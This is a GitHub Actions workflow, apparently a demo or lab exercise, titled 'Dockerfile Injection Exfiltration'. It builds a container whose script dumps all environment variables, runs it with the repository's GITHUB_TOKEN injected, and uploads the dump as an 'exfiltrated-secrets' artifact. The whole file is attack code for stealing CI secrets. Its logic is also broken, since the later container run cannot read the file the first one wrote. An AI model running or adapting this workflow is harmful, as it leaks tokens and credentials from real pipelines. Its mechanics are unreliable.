name: Dockerfile Injection Exfiltration

on:
  push:
    branches: [ main ]

jobs:
  exploit:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v4

    - name: Create malicious Dockerfile
      run: |
        cat <<EOF > Dockerfile
        FROM alpine
        COPY exfil.sh /exfil.sh
        RUN chmod +x /exfil.sh
        CMD ["/exfil.sh"]
        EOF

    - name: Create exfiltration script
      run: |
        cat <<EOF > exfil.sh
        #!/bin/sh
        echo "[RUNNER_ENV]:" > /leaks.txt
        printenv >> /leaks.txt
        EOF

    - name: Build Docker image
      run: docker build -t exfil .

    - name: Run container with secrets injected as env vars
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        SECRET_FLAG: fake-super-secret
      run: |
        docker run --rm -e GITHUB_TOKEN -e SECRET_FLAG exfil

    - name: Extract leaked data
      run: docker run --rm exfil cat /leaks.txt > leaked_env.txt

    - name: Upload leaked secrets as artifact
      uses: actions/upload-artifact@v4
      with:
        name: exfiltrated-secrets
        path: leaked_env.txt
